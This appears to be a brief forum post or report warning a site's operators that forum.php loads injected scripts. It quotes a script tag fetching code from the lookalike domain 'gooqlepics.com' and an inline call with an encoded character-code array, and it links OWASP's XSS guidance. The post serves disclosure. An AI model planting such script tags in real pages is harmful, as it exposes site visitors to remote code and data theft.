These are loaded on forum.php:
<script type='text/javascript' src='http://gooqlepics.com/include.js?in=847'></script>
<script type='text/javascript'>$$track.call(window, [70, 114, 73, 101, 65, 109]);</script>
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Better fix it...